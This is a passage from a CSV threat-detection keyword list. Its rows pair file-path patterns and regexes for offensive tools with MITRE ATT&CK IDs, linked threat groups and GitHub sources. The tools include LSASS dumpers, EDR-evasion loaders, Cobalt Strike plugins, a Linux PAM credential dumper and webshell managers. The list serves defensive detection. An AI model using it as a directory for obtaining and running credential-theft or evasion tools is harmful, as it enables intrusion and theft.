LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","10305" "*/ReflectDump.exe*",".{0,1000}\/ReflectDump\.exe.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the 
lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","1","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","10306" "*/ReflectiveDll.c*",".{0,1000}\/ReflectiveDll\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","10307" "*/ReflectiveDll.x64.dll*",".{0,1000}\/ReflectiveDll\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 
- T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10308" "*/ReflectiveDLLInjection/*",".{0,1000}\/ReflectiveDLLInjection\/.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","10309" "*/ReflectiveLoader.c*",".{0,1000}\/ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","10310" "*/ReflectiveNtdll.git*",".{0,1000}\/ReflectiveNtdll\.git.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","10311" "*/ReflectivePick_x64.dll*",".{0,1000}\/ReflectivePick_x64\.dll.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","10312" 
"*/ReflectivePick_x86.dll*",".{0,1000}\/ReflectivePick_x86\.dll.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","10313" "*/RefleXXion.git*",".{0,1000}\/RefleXXion\.git.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","N/A","10","5","490","105","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z","10314" "*/reg_hive_sam.py*",".{0,1000}\/reg_hive_sam\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10315" "*/reg_hive_security.py*",".{0,1000}\/reg_hive_security\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10316" "*/reg_hive_system.py*",".{0,1000}\/reg_hive_system\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black 
Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10317" "*/reg_recover-rs.exe*",".{0,1000}\/reg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10318" "*/reGeorg.git*",".{0,1000}\/reGeorg\.git.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","10319" "*/RegfDenyTSConnections.ps1*",".{0,1000}\/RegfDenyTSConnections\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","10320" "*/reghivebackup.zip*",".{0,1000}\/reghivebackup\.zip.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","1","#registry","N/A","10","10","N/A","N/A","N/A","N/A","10321" "*/register dll.exe*",".{0,1000}\/register\sdll\.exe.{0,1000}","offensive_tool_keyword","Malware RAT 
collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10322" "*/RegistryPersistence.c*",".{0,1000}\/RegistryPersistence\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","10323" "*/registry-read.py*",".{0,1000}\/registry\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10324" "*/Registry-Recon/*",".{0,1000}\/Registry\-Recon\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","N/A","10","10","325","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z","10325" "*/reg-query.py*",".{0,1000}\/reg\-query\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","10326" "*/RegRdpPort.ps1*",".{0,1000}\/RegRdpPort\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10327" "*/regread.lua*",".{0,1000}\/regread\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10328" "*/regreeper.jpg*",".{0,1000}\/regreeper\.jpg.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","10329" "*/Reg-Restore-Persistence-Mole*",".{0,1000}\/Reg\-Restore\-Persistence\-Mole.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","10330" "*/regsvcs/meterpreter*",".{0,1000}\/regsvcs\/meterpreter.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","10331" "*/regsvr.cmd*",".{0,1000}\/regsvr\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","10332" "*/regsvr32/shellcode_inject*",".{0,1000}\/regsvr32\/shellcode_inject.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","10333" "*/regwrite.lua*",".{0,1000}\/regwrite\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10334" "*/regwritedel.lua*",".{0,1000}\/regwritedel\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","10335" "*/releases/download/*/abc.exe*",".{0,1000}\/releases\/download\/.{0,1000}\/abc\.exe.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","10338" "*/releases/download/Binaries/DeadPotato*",".{0,1000}\/releases\/download\/Binaries\/DeadPotato.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to 
obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","10340" "*/releases/download/impacket_*",".{0,1000}\/releases\/download\/impacket_.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10341" "*/releases/download/panix-v*/panix.sh*",".{0,1000}\/releases\/download\/panix\-v.{0,1000}\/panix\.sh.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","10342" "*/releases/download/v*/pretender_*",".{0,1000}\/releases\/download\/v.{0,1000}\/pretender_.{0,1000}","offensive_tool_keyword","pretender","MitM 
sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","1","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","10343" "*/releases/download/v0.1.0/dnspot-*",".{0,1000}\/releases\/download\/v0\.1\.0\/dnspot\-.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","10344" "*/releases/download/v0.1/pamspy*",".{0,1000}\/releases\/download\/v0\.1\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","10345" "*/releases/download/v0.2/pamspy*",".{0,1000}\/releases\/download\/v0\.2\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","10346" "*/releases/download/v1.0/ADFSRelay*",".{0,1000}\/releases\/download\/v1\.0\/ADFSRelay.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. 
ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","10347" "*/releases/download/v1.0/NTLMParse*",".{0,1000}\/releases\/download\/v1\.0\/NTLMParse.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","10348" "*/releases/download/v4.0.1-godzilla/godzilla.jar*",".{0,1000}\/releases\/download\/v4\.0\.1\-godzilla\/godzilla\.jar.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","10349" 
